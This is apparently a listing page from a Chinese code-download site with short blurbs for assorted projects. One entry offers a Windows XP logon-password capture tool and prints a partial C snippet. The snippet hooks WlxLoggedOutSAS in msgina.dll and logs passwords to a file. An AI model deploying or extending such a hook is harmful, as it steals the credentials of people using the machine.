-
- 2022-02-26 23:44:53下载
- 积分:1
-
医院管理系统
医院管理系统
- 2022-07-16 13:02:31下载
- 积分:1
-
silverlight的p2p库,在sl上实现p2p功能的尝试
silverlight的p2p库,在sl上实现p2p功能的尝试-silverlight p2p lib
- 2022-07-05 12:18:02下载
- 积分:1
-
一个ACE写的服务器端,可以连接多个用户,并处理其请求
一个ACE写的服务器端,可以连接多个用户,并处理其请求-ACE to write a server-side, you can connect multiple users and to address their requests
- 2022-03-09 19:15:01下载
- 积分:1
-
ASM人脸特征提取
ASM,人脸特征提取,运用openGL实现人脸的三维建模并显示运用openGL实现人脸的三维建模并显示运用openGL实现人脸的三维建模并显示运用openGL实现人脸的三维建模并显示
- 2022-01-26 00:25:10下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
自己写的闹钟,供初学者学习。功能有不完善之处希望大家修改。...
自己写的闹钟,供初学者学习。功能有不完善之处希望大家修改。-Write your own alarm clock, for beginners to learn. Functional imperfections have hope that we modify.
- 2022-02-03 21:46:05下载
- 积分:1
-
一个用于测试系统速度的小程序,简单但是使用。for vc only
一个用于测试系统速度的小程序,简单但是使用。for vc only -a speed test system for the small program, but simple to use. For vc only
- 2022-03-05 02:51:10下载
- 积分:1
-
Priorities:
1) Keep It Simple
2) Do not couple to any specific unit te...
Priorities:
1) Keep It Simple
2) Do not couple to any specific unit test framework.
- use appropriate IdTest.pas units to plug into required framework.
Units are named IdTest*, so they can be easily searched/listed.
eg using UnitExpert (http://www.epocalipse.com/downloads.htm) ctrl-u, "idtest", lists all available test units.
-Priorities:
1) Keep It Simple
2) Do not couple to any specific unit test framework.
- use appropriate IdTest.pas units to plug into required framework.
Units are named IdTest*, so they can be easily searched/listed.
eg using UnitExpert (http://www.epocalipse.com/downloads.htm) ctrl-u, "idtest", lists all available test units.
- 2023-01-01 10:35:07下载
- 积分:1
-
鼠标设计课件 原码 值得学习一下 对初学者很有帮助
鼠标设计课件 原码 值得学习一下 对初学者很有帮助-Mouse design courseware to learn about the original code very helpful for beginners
- 2023-06-14 03:40:20下载
- 积分:1